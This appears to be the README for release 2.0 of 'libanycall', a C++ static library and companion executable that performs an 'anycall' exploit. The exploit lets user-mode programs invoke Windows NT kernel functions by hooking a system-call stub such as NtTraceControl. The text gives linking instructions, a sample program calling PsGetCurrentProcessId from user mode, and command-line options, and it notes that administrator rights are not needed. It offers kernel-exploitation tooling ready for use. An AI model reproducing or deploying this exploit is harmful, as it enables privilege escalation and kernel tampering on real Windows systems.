Release 2.0 includes libanycall, the powerful c++ static-library for anycall exploit execution.

Usage

1. link it (e.g, #pragma comment( lib, "libanycall64" ))
2. include (e.g, #include "libanycall.h")

For example:

#include <windows.h>
#include <iostream>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %d\n", process_id );

    return EXIT_SUCCESS;
}

Usage

anycall64.exe [module name] [procedure name]

*administrator privilege does not required to run

Following augments are supported:

• (optional) module name the module exports [procedure name] e.g, ntdll.dll
• (optional) procedure name the function to hook, used to fetch from both ntoskrnl and [module name] e.g, NtTraceControl

if not specified, ntdll.dll and NtTraceControl are used.